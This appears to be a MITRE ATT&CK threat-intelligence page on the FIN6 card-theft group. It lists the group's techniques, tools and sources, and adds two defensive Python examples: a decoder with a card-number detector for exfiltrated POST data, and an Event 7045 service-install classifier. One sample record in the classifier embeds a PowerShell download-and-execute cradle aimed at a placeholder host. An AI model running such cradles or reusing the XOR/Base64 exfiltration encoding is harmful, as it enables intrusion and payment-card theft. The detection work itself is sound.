
G0037 FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.[2][3]

ID: G0037
Associated Names: Magecart Group 6, ITG08, Skeleton Spider
Version: 3.3
Created: 31 May 2017
Last Modified: 22 March 2023

Associated Group Descriptions

Name Reference
Magecart Group 6 [4]
ITG08 [5]
Skeleton Spider [1]

Techniques Used

Domain ID Name Use
enterprise T1134 Access Token Manipulation FIN6 has used Metasploit’s named-pipe impersonation technique to escalate privileges.[3]
enterprise T1087 Account Discovery -
enterprise T1087.002 Domain Account FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim’s Active Directory database.[2]
enterprise T1560 Archive Collected Data Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.[2]
enterprise T1560.003 Archive via Custom Method FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.[2][7]
enterprise T1119 Automated Collection FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.[2][7]
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.[2]
enterprise T1110 Brute Force -
enterprise T1110.002 Password Cracking FIN6 has extracted password hashes from ntds.dit to crack offline.[2]
enterprise T1059 Command and Scripting Interpreter FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[2][3]
enterprise T1059.001 PowerShell FIN6 has used PowerShell to gain access to merchants’ networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.[2][3][6]
enterprise T1059.003 Windows Command Shell FIN6 has used a kill.bat script to disable security tools.[3]
enterprise T1059.007 JavaScript FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.[7]
enterprise T1555 Credentials from Password Stores FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.[6]
enterprise T1555.003 Credentials from Web Browsers FIN6 has used the Stealer One credential stealer to target web browsers.[6]
enterprise T1213 Data from Information Repositories FIN6 has collected schemas and user accounts from systems running SQL Server.[6]
enterprise T1005 Data from Local System FIN6 has collected and exfiltrated payment card data from compromised systems.[7][8][9]
enterprise T1074 Data Staged -
enterprise T1074.002 Remote Data Staging FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.[2]
enterprise T1573 Encrypted Channel -
enterprise T1573.002 Asymmetric Cryptography FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[2]
enterprise T1048 Exfiltration Over Alternative Protocol -
enterprise T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.[7]
enterprise T1068 Exploitation for Privilege Escalation FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.[2]
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools FIN6 has deployed a utility script named kill.bat to disable anti-virus.[3]
enterprise T1070 Indicator Removal -
enterprise T1070.004 File Deletion FIN6 has removed files from victim machines.[2]
enterprise T1036 Masquerading -
enterprise T1036.004 Masquerade Task or Service FIN6 has renamed the “psexec” service name to “mstdc” to masquerade as a legitimate Windows service.[3]
enterprise T1046 Network Service Discovery FIN6 used publicly available tools (including Microsoft’s built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[2]
enterprise T1095 Non-Application Layer Protocol FIN6 has used Metasploit Bind and Reverse TCP stagers.[7]
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.010 Command Obfuscation FIN6 has used encoded PowerShell commands.[6]
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.[5][3]
enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory FIN6 has used Windows Credential Editor for credential dumping.[2][3]
enterprise T1003.003 NTDS FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim’s Active Directory database.[2][3]
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment FIN6 has targeted victims with e-mails containing malicious attachments.[6]
enterprise T1566.003 Spearphishing via Service FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.[5]
enterprise T1572 Protocol Tunneling FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[2]
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol FIN6 used RDP to move laterally in victim networks.[2][3]
enterprise T1018 Remote System Discovery FIN6 used publicly available tools (including Microsoft’s built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[2]
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.[2]
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing FIN6 has used Comodo code-signing certificates.[5]
enterprise T1569 System Services -
enterprise T1569.002 Service Execution FIN6 has created Windows services to execute encoded PowerShell commands.[3]
enterprise T1204 User Execution -
enterprise T1204.002 Malicious File FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.[6]
enterprise T1078 Valid Accounts To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.[2][3][6]
enterprise T1102 Web Service FIN6 has used Pastebin and Google Storage to host content for their operations.[3]
enterprise T1047 Windows Management Instrumentation FIN6 has used WMI to automate the remote execution of PowerShell scripts.[5]
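The T1560.003 entry above (single-byte XOR with 0xAA, then Base64 over a permuted alphabet) and the T1048.003 / T1005 entries (card data sent out in HTTP POST bodies) describe a pipeline an analyst has to reverse to confirm what left the network. The following is an added example written for this page, not FIN6 or FrameworkPOS code: a codec in that shape, followed by a Luhn-based check for primary account numbers in the decoded body. The page does not give the actual substitution table or the Base64 permutation, so the rotated alphabet here is an assumption, as are the sample record and the constants `XOR_KEY`, `PAN_RE` and `SAMPLE_RECORD`; the PAN in the sample is a standard test number.

```python
import base64
import re
import string

# Added example (not FIN6 code): a codec in the shape ATT&CK describes for
# T1560.003 (single-byte XOR with 0xAA, then Base64 over a permuted alphabet),
# plus a Luhn-based check for payment card numbers in a decoded HTTP POST body
# (T1048.003 / T1005). The real substitution table and Base64 permutation used
# by FIN6 tooling are not given on the page; the ones below are assumptions.

XOR_KEY = 0xAA

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Assumed permutation: rotate the standard alphabet by 13 positions. Any
# bijection over the 64 symbols works the same way for encode and decode.
PERMUTED_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]
_ENC_TABLE = str.maketrans(STD_ALPHABET, PERMUTED_ALPHABET)
_DEC_TABLE = str.maketrans(PERMUTED_ALPHABET, STD_ALPHABET)


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def b64_permuted_encode(data: bytes) -> str:
    """Standard Base64, then map each symbol into the permuted alphabet."""
    return base64.b64encode(data).decode("ascii").translate(_ENC_TABLE)


def b64_permuted_decode(text: str) -> bytes:
    """Map symbols back to the standard alphabet, then decode ('=' padding is untouched)."""
    return base64.b64decode(text.translate(_DEC_TABLE))


def encode_record(plaintext: bytes) -> str:
    """XOR first, then permuted Base64: the order the ATT&CK entry describes."""
    return b64_permuted_encode(xor_bytes(plaintext))


def decode_record(encoded: str) -> bytes:
    """Inverse of encode_record."""
    return xor_bytes(b64_permuted_decode(encoded))


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit validation, used to cut false positives on long digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


# 13 to 19 digit runs not adjacent to other digits (assumed PAN length range).
PAN_RE = re.compile(r"(?<!\d)(\d{13,19})(?!\d)")


def find_pans(blob: bytes) -> list:
    """Return Luhn-valid digit runs found in decoded data."""
    text = blob.decode("latin-1")
    return [m for m in PAN_RE.findall(text) if luhn_ok(m)]


def inspect_post_body(body: str) -> list:
    """Decode a captured POST body with the assumed scheme and report card numbers."""
    try:
        plain = decode_record(body.strip())
    except ValueError:  # binascii.Error (bad Base64) is a ValueError subclass
        return []
    return find_pans(plain)


# Constructed sample record; the PAN is a standard test number, not a real card.
SAMPLE_RECORD = b"host=POS-07;pan=4111111111111111;exp=2712;name=TEST CARD\n"
SAMPLE_POST_BODY = encode_record(SAMPLE_RECORD)

if __name__ == "__main__":
    print("encoded body:", SAMPLE_POST_BODY)
    print("card numbers found:", inspect_post_body(SAMPLE_POST_BODY))
```

Feed `inspect_post_body` the body of any outbound POST that looks like opaque Base64 from a PoS host; if the real permutation differs from the assumed one, the XOR and Base64 steps still apply once `PERMUTED_ALPHABET` is replaced with the table recovered from the sample.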

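Two rows above turn on the same Windows artifact: the T1036.004 entry (the PsExec service renamed to “mstdc”) and the T1569.002 / T1027.010 entries (services created to run encoded PowerShell). Both land in the System log as Event ID 7045 (service installed). The following is an added example for this page, not FIN6 tooling or a vendor detection: it classifies 7045 records for those two behaviours. The regexes, the finding labels, and the sample records (including the `-encodedcommand` payload built from `SAMPLE_SCRIPT`) are constructed for the example; the one fact taken from the page is the “mstdc” name.

```python
import base64
import re

# Added example (not FIN6 code): classify Windows System log Event ID 7045
# (service installed) records for two behaviours on this page: a PsExec
# service renamed to masquerade (T1036.004, "mstdc") and a service whose
# ImagePath runs encoded PowerShell (T1569.002 / T1027.010). Field names
# follow the 7045 event; the records themselves are constructed.

# PsExec copies its service binary into the ADMIN$ share (%SystemRoot%) and
# registers it from there, whatever name the -r option gives it. A service
# binary registered from the root of %SystemRoot% rather than System32 is the
# tell that survives renaming.
PSEXEC_STYLE_PATH = re.compile(r"^%SystemRoot%\\[^\\]+\.exe$", re.IGNORECASE)
# -EncodedCommand and its accepted abbreviations, followed by the Base64 blob.
ENCODED_PS = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
KNOWN_FIN6_SERVICE_NAMES = {"mstdc"}  # name reported in the Pick-Six intrusion


def decode_encoded_command(b64: str):
    """-EncodedCommand payloads are Base64 over UTF-16LE; None if it does not decode."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_encoded_command(script: str) -> str:
    """Inverse of decode_encoded_command, used here only to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def classify_service_install(event: dict) -> list:
    """Return the findings for one 7045 record; an empty list means nothing flagged."""
    findings = []
    if event.get("EventID") != 7045:
        return findings
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")

    if PSEXEC_STYLE_PATH.match(path):
        if name.upper() == "PSEXESVC":
            findings.append("psexec_service")
        else:
            findings.append("psexec_style_service_renamed:" + name)
    if name.lower() in KNOWN_FIN6_SERVICE_NAMES:
        findings.append("known_fin6_service_name:" + name)

    m = ENCODED_PS.search(path)
    if m:
        decoded = decode_encoded_command(m.group(1))
        findings.append("encoded_powershell:" + (decoded if decoded else "<undecodable>"))
    return findings


def scan_events(events) -> dict:
    """Map ServiceName -> findings for every record that produced any."""
    out = {}
    for ev in events:
        hits = classify_service_install(ev)
        if hits:
            out[ev.get("ServiceName", "")] = hits
    return out


# Constructed sample records. The encoded command is built from SAMPLE_SCRIPT so
# the decoder's output can be checked; the host name in it is a reserved test name.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "mstdc",
     "ImagePath": r"%SystemRoot%\mstdc.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Updater",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden "
                  "-encodedcommand " + build_encoded_command(SAMPLE_SCRIPT),
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "PrintSvc2",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
]

if __name__ == "__main__":
    for svc, hits in scan_events(SAMPLE_EVENTS).items():
        print(svc, "->", hits)
```

The renamed-PsExec rule deliberately keys on the image path rather than the service name, because the name is exactly what the actor controls; the “mstdc” match is kept as a second, weaker signal for the name this page reports.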
Software

ID Name [References] Techniques (listed as sub-technique:technique, separated by semicolons)
S0552 AdFind [3] Domain Account:Account Discovery; Domain Trust Discovery; Domain Groups:Permission Groups Discovery; Remote System Discovery; System Network Configuration Discovery
S0154 Cobalt Strike [3] Sudo and Sudo Caching:Abuse Elevation Control Mechanism; Bypass User Account Control:Abuse Elevation Control Mechanism; Token Impersonation/Theft:Access Token Manipulation; Make and Impersonate Token:Access Token Manipulation; Parent PID Spoofing:Access Token Manipulation; Domain Account:Account Discovery; Web Protocols:Application Layer Protocol; DNS:Application Layer Protocol; Application Layer Protocol; BITS Jobs; Browser Session Hijacking; Visual Basic:Command and Scripting Interpreter; Python:Command and Scripting Interpreter; JavaScript:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Windows Command Shell:Command and Scripting Interpreter; Windows Service:Create or Modify System Process; Standard Encoding:Data Encoding; Data from Local System; Protocol Impersonation:Data Obfuscation; Data Transfer Size Limits; Deobfuscate/Decode Files or Information; Asymmetric Cryptography:Encrypted Channel; Symmetric Cryptography:Encrypted Channel; Exploitation for Client Execution; Exploitation for Privilege Escalation; File and Directory Discovery; Process Argument Spoofing:Hide Artifacts; Disable or Modify Tools:Impair Defenses; Timestomp:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Modify Registry; Native API; Network Service Discovery; Network Share Discovery; Non-Application Layer Protocol; Indicator Removal from Tools:Obfuscated Files or Information; Obfuscated Files or Information; Office Template Macros:Office Application Startup; Security Account Manager:OS Credential Dumping; LSASS Memory:OS Credential Dumping; Local Groups:Permission Groups Discovery; Domain Groups:Permission Groups Discovery; Process Discovery; Process Hollowing:Process Injection; Process Injection; Dynamic-link Library Injection:Process Injection; Protocol Tunneling; Domain Fronting:Proxy; Internal Proxy:Proxy; Query Registry; Reflective Code Loading; Windows Remote Management:Remote Services; SMB/Windows Admin Shares:Remote Services; SSH:Remote Services; Remote Desktop Protocol:Remote Services; Distributed Component Object Model:Remote Services; Remote System Discovery; Scheduled Transfer; Screen Capture; Software Discovery; Code Signing:Subvert Trust Controls; Rundll32:System Binary Proxy Execution; System Network Configuration Discovery; System Network Connections Discovery; System Service Discovery; Service Execution:System Services; Pass the Hash:Use Alternate Authentication Material; Domain Accounts:Valid Accounts; Local Accounts:Valid Accounts; Windows Management Instrumentation
S0381 FlawedAmmyy [6] Web Protocols:Application Layer Protocol; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Clipboard Data; Windows Command Shell:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Data from Local System; Data Obfuscation; Symmetric Cryptography:Encrypted Channel; Exfiltration Over C2 Channel; File Deletion:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Input Capture; Peripheral Device Discovery; Local Groups:Permission Groups Discovery; Screen Capture; Security Software Discovery:Software Discovery; Rundll32:System Binary Proxy Execution; Msiexec:System Binary Proxy Execution; System Information Discovery; System Owner/User Discovery; Windows Management Instrumentation
S0503 FrameworkPOS [1][11][6] Archive via Custom Method:Archive Collected Data; Data from Local System; Local Data Staging:Data Staged; Exfiltration Over Alternative Protocol; Process Discovery
S0632 GrimAgent [10] Web Protocols:Application Layer Protocol; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Windows Command Shell:Command and Scripting Interpreter; Standard Encoding:Data Encoding; Data from Local System; Junk Data:Data Obfuscation; Deobfuscate/Decode Files or Information; Asymmetric Cryptography:Encrypted Channel; Symmetric Cryptography:Encrypted Channel; Exfiltration Over C2 Channel; File and Directory Discovery; File Deletion:Indicator Removal; Clear Persistence:Indicator Removal; Ingress Tool Transfer; Native API; Obfuscated Files or Information; Binary Padding:Obfuscated Files or Information; Scheduled Task:Scheduled Task/Job; System Information Discovery; System Location Discovery; System Language Discovery:System Location Discovery; System Network Configuration Discovery; System Owner/User Discovery; Time Based Evasion:Virtualization/Sandbox Evasion
S0372 LockerGoga [3] Account Access Removal; Data Encrypted for Impact; Disable or Modify Tools:Impair Defenses; File Deletion:Indicator Removal; Lateral Tool Transfer; Loss of Control; Loss of Productivity and Revenue; Loss of View; Code Signing:Subvert Trust Controls; System Shutdown/Reboot
S0449 Maze [12] Web Protocols:Application Layer Protocol; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Windows Command Shell:Command and Scripting Interpreter; Data Encrypted for Impact; Dynamic Resolution; Run Virtual Instance:Hide Artifacts; Disable or Modify Tools:Impair Defenses; Indicator Removal; Inhibit System Recovery; Masquerade Task or Service:Masquerading; Native API; Binary Padding:Obfuscated Files or Information; Obfuscated Files or Information; Process Discovery; Dynamic-link Library Injection:Process Injection; Scheduled Task:Scheduled Task/Job; Service Stop; Msiexec:System Binary Proxy Execution; System Information Discovery; System Language Discovery:System Location Discovery; System Network Connections Discovery; System Shutdown/Reboot; Windows Management Instrumentation
S0002 Mimikatz [5] SID-History Injection:Access Token Manipulation; Account Manipulation; Security Support Provider:Boot or Logon Autostart Execution; Credentials from Password Stores; Windows Credential Manager:Credentials from Password Stores; Credentials from Web Browsers:Credentials from Password Stores; LSASS Memory:OS Credential Dumping; DCSync:OS Credential Dumping; Security Account Manager:OS Credential Dumping; LSA Secrets:OS Credential Dumping; Rogue Domain Controller; Steal or Forge Authentication Certificates; Silver Ticket:Steal or Forge Kerberos Tickets; Golden Ticket:Steal or Forge Kerberos Tickets; Private Keys:Unsecured Credentials; Pass the Ticket:Use Alternate Authentication Material; Pass the Hash:Use Alternate Authentication Material
S0284 More_eggs [5][6] Web Protocols:Application Layer Protocol; Windows Command Shell:Command and Scripting Interpreter; Standard Encoding:Data Encoding; Deobfuscate/Decode Files or Information; Symmetric Cryptography:Encrypted Channel; File Deletion:Indicator Removal; Ingress Tool Transfer; Obfuscated Files or Information; Security Software Discovery:Software Discovery; Code Signing:Subvert Trust Controls; Regsvr32:System Binary Proxy Execution; System Information Discovery; Internet Connection Discovery:System Network Configuration Discovery; System Network Configuration Discovery; System Owner/User Discovery
S0029 PsExec [2][3] Domain Account:Create Account; Windows Service:Create or Modify System Process; Lateral Tool Transfer; SMB/Windows Admin Shares:Remote Services; Service Execution:System Services
S0446 Ryuk [3] Access Token Manipulation; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Windows Command Shell:Command and Scripting Interpreter; Data Encrypted for Impact; File and Directory Discovery; Windows File and Directory Permissions Modification:File and Directory Permissions Modification; Disable or Modify Tools:Impair Defenses; Inhibit System Recovery; Loss of Productivity and Revenue; Match Legitimate Name or Location:Masquerading; Masquerading; Native API; Obfuscated Files or Information; Process Discovery; Process Injection; SMB/Windows Admin Shares:Remote Services; Scheduled Task:Scheduled Task/Job; Service Stop; System Information Discovery; System Language Discovery:System Location Discovery; System Network Configuration Discovery; Traffic Signaling; Domain Accounts:Valid Accounts
S0005 Windows Credential Editor [2] LSASS Memory:OS Credential Dumping

References
  1. CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. 

  2. FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. 

  3. McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. 

  4. Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020. 

  5. Villadsen, O. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019. 

  6. Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019. 

  7. Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020. 

  8. Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020. 

  9. Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020. 

  10. Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021. 

  11. Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020. 

  12. Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.